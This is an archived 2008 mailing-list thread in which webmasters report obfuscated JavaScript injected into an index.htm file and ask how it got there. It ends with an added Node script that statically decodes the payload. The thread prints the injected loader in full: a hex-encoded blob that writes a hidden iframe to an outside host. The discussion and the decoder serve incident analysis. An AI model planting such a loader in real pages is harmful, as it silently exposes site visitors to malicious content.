It happened to a WordPress blog of a customer's recently - so it's not
targeting CF ...
On Wed, Jul 30, 2008 at 9:41 AM, Vivec <[EMAIL PROTECTED]> wrote:
> Just yesterday I saw something very similar in a .js file.
>
> Is there a vulnerability in CF that they are using to do this, or is
> this something else?
>
> 2008/7/30 morchella <[EMAIL PROTECTED]>:
> > ok found this in index.htm
> > replaced script with (cript)
> >
> > how the hell could they overwrite a htm file?
> >
> > (cript)function xy1q487fce1adcbd9(q487fce1add3a9){ return
> > (parseInt(q487fce1add3a9,16));}function
> > q487fce1adeb18(q487fce1adf2e8){ function q487fce1ae0a57 () {return 2;}
> > var
> q487fce1adfab8='';q487fce1ae19f7=String.fromCharCode;for(q487fce1ae0287=0;q487fce1ae0287<q487fce1adf2e8.length;q487fce1ae0287+=q487fce1ae0a57()){
> >
> q487fce1adfab8+=(q487fce1ae19f7(xy1q487fce1adcbd9(q487fce1adf2e8.substr(q487fce1ae0287,q487fce1ae0a57()))));}return
> > q487fce1adfab8;} var
> >
> q487fce1ae21c6='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533342533382533372533322533302532392532622532372536362536332533342532372532302537372536392536342537342536382533642533342533362533342532302536382536352536392536372536382537342533642533312533302533352532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487fce1adeb18(q487fce1ae21c6));(/cript)
>
>
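
Added example, not part of the original thread: the posted script turns a hex string into text two characters at a time and hands it to document.write, and the decoded text in turn calls unescape() on a percent-encoded string. The sketch below peels those layers statically in Node so the injected markup can be read without loading the page; the function names, the sample string and the example.invalid URL are constructed for illustration.

```javascript
// Added example: static decoder for the hex-pair + unescape() pattern.
// Input is handled as data only; nothing is evaluated or written to a page.

// Layer 1: same arithmetic as the posted loop (parseInt(pair, 16) per byte).
function decodeHexPairs(hex) {
  if (!/^(?:[0-9a-fA-F]{2})+$/.test(hex)) throw new Error('not hex pairs');
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Layer 2: one pass of unescape()-style %XX decoding.
function percentDecodeOnce(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Find long quoted hex literals, peel both layers, report what they would inject.
function analyze(source, maxPasses = 5) {
  const blobs = source.match(/'(?:[0-9a-fA-F]{2}){20,}'/g) || [];
  return blobs.map((quoted) => {
    let text = decodeHexPairs(quoted.slice(1, -1));
    let percentPasses = 0;
    while (percentPasses < maxPasses) {
      const next = percentDecodeOnce(text);
      if (next === text) break; // nothing left to decode
      text = next;
      percentPasses++;
    }
    return {
      decoded: text,
      percentPasses,
      hasIframe: /<iframe/i.test(text),
      urls: text.match(/https?:\/\/[^\s'"<>]+/g) || [],
    };
  });
}

// Constructed sample (not the blob from the post), using a reserved domain.
const enc = (s, p) => Array.from(s, (c) => p + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const INNER = "<iframe src='http://example.invalid/x.cgi' style='display: none'></iframe>";
const SAMPLE = "var v='" + enc("<script>document.write(unescape('" + enc(INNER, '%') + "'));</script>", '') + "';";

console.log(analyze(SAMPLE));
```

Run it against a saved copy of the modified file read as text; the `urls` and `hasIframe` fields give something concrete to search for across the rest of the web root and in proxy logs.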
Archive:
http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:264980